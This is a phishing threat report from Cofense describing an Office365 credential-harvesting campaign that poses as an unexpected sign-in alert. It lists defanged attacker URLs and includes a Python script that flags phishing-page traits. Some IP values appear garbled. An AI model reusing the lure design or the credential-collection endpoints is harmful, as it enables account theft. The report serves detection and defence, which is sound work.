Microsoft O365 EOP/ATP
IronPort
TrendMicro
Mimecast
Symantec
By Luis Raul Parra, Cofense Phishing Defense Center
At some point in your (digital) life you have received annoying notifications about unexpected sign-in attempts to one of your accounts/services, and you have ignored them. After all, it was just an attempt – no one was able to access anything. Yet, if you are vigilant enough, you would report this unauthorized attempt to the service provider and contribute to enhancing security. Well done! But keep reading; this article is for you.
The Cofense Phishing Defense Center (PDC) has observed a new phishing campaign that aims to harvest Office365 (O365) credentials of “vigilant” users who want to act on unrecognized sign-in attempts to their accounts.
The campaign was reported by users in several companies across English-speaking countries including the United States, England and Scotland. The message was carefully crafted to pass as a real alert of an unexpected sign-in on the recipient’s corporate account. It urged immediate action.
Figure 1: Email Body
All reported emails used the same technique to customize the attack: The “From” field contained the address “[email protected]” in order to convince the end user that this was a valid alert notification from their company’s email security system.
Figure 2: Email Header
The subject of the email states that there was a sign-in attempt to the user’s account from an unrecognized device, specifying the name of the user and claiming to come from “COMPANYNAME Mail Service”. The content of the body states the timestamp, location, IP address and device where the (false) attempt was performed. In all cases, the IP address shown in the body was 1942097762.
To make the email even more credible, the attackers included a confirmation code stated to be valid for 24 hours, with the aim of pressuring the recipient to act within that time. They were thoughtful enough to add the message “if this was you, you’re all set!”
Furthermore, there was the option to click on the “Unsubscribe” button in order to stop receiving future messages like these. The URL behind it, a link of the type hxxps://tracking[.]mail[.]netflix[.]tshirtsintaramerica[.]com/click/*, is possibly just a tracker that then redirects to the official company website.
The credential phishing attempt was done through an HTML file attached to the email. Images and CSS styles were pulled from a different website: hxxps://youmustlast[.]website/wassets/:
Figure 3: CSS Style
The HTML file already contained the user’s email address in the email account address field:
Figure 4: Phishing Page
Should the recipient enter their corporate credentials into the attached HTML page, a POST action sends the username and password to the threat actor at the URL hxxps://sharepreview[.]site/win/next[.]php.
Figure 5: POST Action
Credential phishing done. At the same time, you’ve been made to feel vigilant at having spotted something untoward happening with your account. That’s how the attackers attempt to trip up alert and conscientious users.
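The traits described above (a password form that posts to an absolute external URL, the recipient's address already filled in, and styling pulled from a remote host) can be checked statically when triaging a reported HTML attachment. The sketch below is an added example, not code from the original article or from Cofense; the function and class names, the sample markup and the `*.example` hosts are all constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class AttachmentTriage(HTMLParser):
    """Collects phishing-page traits from one HTML attachment (hypothetical helper)."""

    def __init__(self, recipient):
        super().__init__()
        self.recipient = recipient.lower()
        self.form_actions = []     # absolute http(s) form targets
        self.has_password = False  # a password input exists
        self.prefilled = False     # recipient address already in a field
        self.remote_hosts = set()  # hosts serving CSS or images

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form" and urlparse(a.get("action", "")).scheme in ("http", "https"):
            self.form_actions.append(a["action"])
        elif tag == "input":
            if a.get("type", "").lower() == "password":
                self.has_password = True
            if self.recipient and self.recipient in a.get("value", "").lower():
                self.prefilled = True
        elif tag in ("link", "img"):
            host = urlparse(a.get("href") or a.get("src") or "").hostname
            if host:
                self.remote_hosts.add(host)


def triage(html, recipient):
    """Return a list of findings for an attachment sent to `recipient`."""
    p = AttachmentTriage(recipient)
    p.feed(html)
    findings = []
    if p.form_actions and p.has_password:
        findings.append("password form posts to " + p.form_actions[0])
    if p.prefilled:
        findings.append("recipient address pre-filled")
    if p.remote_hosts:
        findings.append("remote assets from " + ", ".join(sorted(p.remote_hosts)))
    return findings


# Constructed sample; hosts are placeholders, not the campaign's infrastructure.
SAMPLE = """<html><head>
<link rel="stylesheet" href="https://assets.example/css/style.css">
</head><body><form method="post" action="https://collector.example/next.php">
<input type="email" name="user" value="jane.doe@corp.example">
<input type="password" name="pass"></form></body></html>"""
```

Calling `triage(SAMPLE, "jane.doe@corp.example")` returns all three findings. A page that submits credentials from script rather than a form `action` would not be caught by this static check.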
Network IOC | IP |
hXXps://sharepreview[.]site/win/next[.]php | 23254130108 |
hXXps://youmustlast[.]website/wassets/statuspagecss | 632503873 |